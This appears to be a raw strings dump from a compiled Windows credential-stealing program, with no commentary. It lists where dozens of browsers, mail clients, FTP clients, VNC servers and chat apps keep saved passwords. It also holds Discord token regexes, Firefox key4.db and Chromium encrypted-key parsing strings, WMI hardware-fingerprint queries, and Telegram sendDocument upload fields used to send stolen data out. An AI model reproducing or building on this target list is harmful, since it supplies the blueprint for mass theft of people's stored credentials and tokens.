\FlashFXP\
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
Server
SystemDrive
\FTP Navigator\Ftplist.txt
No Password
SmartFTP
SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
;Server=
;Port=
;Password=
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\Program Files (x86)\FTP Commander\Ftplist.txt
\cftp\Ftplist.txt
;User=
;Anonymous=
\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
FTPGetter
\FTPGetter\servers.xml
<server>
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
COMPlus_legacyCorruptedStateExceptionsPolicy
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
eM Client\accounts.dat
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
o6806642kbM7c5
Mailbird
SenderIdentities
Server_Host
Username
EncryptedPassword
\Mailbird\Store\Store.db
RealVNC 4.x
SOFTWARE\RealVNC\WinVNC4
TightVNC
Software\TightVNC\Server
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
RealVNC 3.x
Software\ORL\WinVNC3
SOFTWARE\RealVNC\vncserver
TightVNC ControlPassword
ControlPassword
PasswordViewOnly
TigerVNC
Software\TigerVNC\Server
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
discordptb
Local Storage\leveldb
discordcanary
origin_url
username_value
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Login Data
\Default\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
logins.json
[^\u0020-\u007F]
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Host:
Password:
Application:
Username:
<br><hr>
<br>Username:
<br>Application:
<br>Password:
Torch Browser
Torch\User Data
Thunderbird
\Thunderbird\
Firefox
\Mozilla\Firefox\
Edge Chromium
Microsoft\Edge\User Data
BlackHawk
\NETGATE Technologies\BlackHawk\
Cool Novo
MapleStudio\ChromePlus\User Data
Opera Browser
Opera Software\Opera Stable
Liebao Browser
liebao\User Data
Iridium Browser
Iridium\User Data
Epic Privacy
Epic Privacy Browser\User Data
SeaMonkey
\Mozilla\SeaMonkey\
Citrio
CatalinaGroup\Citrio\User Data
Sputnik
Sputnik\Sputnik\User Data
PaleMoon
\Moonchild Productions\Pale Moon\
IceCat
\Mozilla\icecat\
Chromium
Chromium\User Data
7Star\7Star\User Data
Elements Browser
Elements Browser\User Data
QIP Surf
QIP Surf\User Data
uCozMedia\Uran\User Data
Chrome
Google\Chrome\User Data
Orbitum
Orbitum\User Data
Comodo Dragon
Comodo\Dragon\User Data
Chedot
Chedot\User Data
Vivaldi
Vivaldi\User Data
CentBrowser
CentBrowser\User Data
Postbox
\Postbox\
CyberFox
\8pecxstudios\Cyberfox\
BraveSoftware\Brave-Browser\User Data
IceDragon
\Comodo\IceDragon\
K-Meleon
\K-Meleon\
Kometa
Kometa\User Data
WaterFox
\Waterfox\
Coowon
Coowon\Coowon\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Coccoc
CocCoc\Browser\User Data
Amigo\User Data
Yandex Browser
Yandex\YandexBrowser\User Data
360 Browser
360Chrome\Chrome\User Data
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
{0:X2}
SEQUENCE {
OCTETSTRING
INTEGER
OBJECTIDENTIFIER
Windows Credential
policy
{{{0}}}
chrome
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
efd30d97-91f9-42dd-b7ee-31e0b3df0c01
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
5acc6bfb-2fb5-4175-bc7c-3c476d745ee4
Win32_BaseBoard
SerialNumber
769ad555-29d8-4d8a-8d14-054495b7f6d2
chat_id
caption
yyyy-MM-dd HH-mm-ss
text/plain
sendDocument
document
---------------------------
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}"
Content-Disposition: form-data; name="{0}"; filename="{1}"
Content-Type: {2}
Version: 0x{0:X}
FormatID: {0}
StorageSize: {0} (0x{0:X})
Size of the SerializedPropertyStorage is less than 28 ({0})
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Version is not equal to {0} ({1})
Size of the SerializedPropertyStore is less than {0} ({1})
Type: {0}
Value: {0}
ValueSize: {0} (0x{0:X})
NameSize: {0} (0x{0:X})
Name: {0}
Size of the StringName is not equal to {0} ({1})
Size of the StringName is less than 9 ({0})
Size of the NameSize is not equal to {0} ({1})
ID: 0x{0:X}
Size of the SerializedPropertyStore is less than 8 ({0})
StoreSize: {0} (0x{0X})
\Device\LanmanRedirector\
Failed to retrieve system handle information.
Accounts
logins
sha512
credential
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
04fa7bea-03e6-4a3d-949f-ac9a3ae6946d.exe
LegalCopyright
OriginalFilename
04fa7bea-03e6-4a3d-949f-ac9a3ae6946d.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0